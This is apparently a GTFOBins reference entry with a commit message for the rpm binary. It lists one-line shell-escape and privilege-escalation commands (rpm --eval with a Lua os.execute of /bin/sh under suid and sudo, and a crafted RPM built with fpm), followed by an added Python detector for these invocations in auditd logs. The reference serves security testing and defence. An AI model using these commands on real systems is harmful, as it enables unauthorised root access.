GTFOBins.github.io/_gtfobins/rpm.md
brian 3bd955e8cc Use os.execute instead of posix.exec in rpm
From rpm versions 4.9.0 and on, posix.exec() will return an error unless called
from a child process created with posix.fork(). os.execute() may be used
instead.

This change is documented in these two resources:

- http://rpm.org/user_doc/lua.html
- https://rpm-packaging-guide.github.io/

Close #53.
2019-02-14 12:32:18 +01:00

593 B

functions:
  shell:
    - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
  suid:
    - code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
  sudo:
    - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
    - description: |
        It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
        ```
        TF=$(mktemp -d)
        echo 'id' > $TF/x.sh
        fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
        ```
      code: sudo rpm -ivh x-1.0-1.noarch.rpm
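For detection, the `rpm --eval` invocations listed above can be matched in auditd `EXECVE` records. The sketch below is an added example, not part of GTFOBins or this commit. It assumes Linux audit logging of `execve` is enabled, and the sample records are constructed. Because the macro argument contains double quotes, auditd writes it hex-encoded, so the argument has to be decoded before matching.

```python
import re

# Lua process-spawning calls named on this page, inside an rpm %{lua:...} macro.
LUA_SPAWN = re.compile(r"%\{lua:.*\b(?:os\.execute|posix\.exec)\s*\(", re.S)
# auditd writes each argument as aN="text" or, when it holds quotes/spaces, as bare hex.
ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def execve_args(record):
    """Rebuild argv from one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG.findall(record):
        if hexed:
            try:
                args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace")
            except ValueError:          # odd-length or truncated hex: keep raw text
                args[int(idx)] = hexed
        else:
            args[int(idx)] = quoted
    return [args[i] for i in sorted(args)]

def is_rpm_lua_exec(argv):
    """True when rpm (directly or via sudo) evaluates a Lua macro that spawns a process."""
    names = [a.rsplit("/", 1)[-1] for a in argv]
    if "rpm" not in names:
        return False
    rest = argv[names.index("rpm") + 1:]
    for i, arg in enumerate(rest):
        if arg in ("--eval", "-E") and i + 1 < len(rest):
            expr = rest[i + 1]
        elif arg.startswith("--eval="):
            expr = arg[len("--eval="):]
        else:
            continue
        if LUA_SPAWN.search(expr):
            return True
    return False

def flagged(records):
    return [i for i, r in enumerate(records) if is_rpm_lua_exec(execve_args(r))]

# Constructed sample records (not captured from a real host).
EXPR = '%{lua:os.execute("/bin/sh")}'
HEX = EXPR.encode().hex().upper()
SAMPLES = [
    'type=EXECVE msg=audit(1550144000.101:901): argc=3 a0="rpm" a1="--eval" a2=' + HEX,
    'type=EXECVE msg=audit(1550144000.202:902): argc=4 a0="sudo" a1="rpm" a2="--eval" a3=' + HEX,
    'type=EXECVE msg=audit(1550144000.303:903): argc=3 a0="rpm" a1="--eval" a2="%{_libdir}"',
    'type=EXECVE msg=audit(1550144000.404:904): argc=2 a0="rpm" a1="-qa"',
]
```

`flagged(SAMPLES)` returns the indexes of the first two records; the ordinary macro query and the package listing are not flagged.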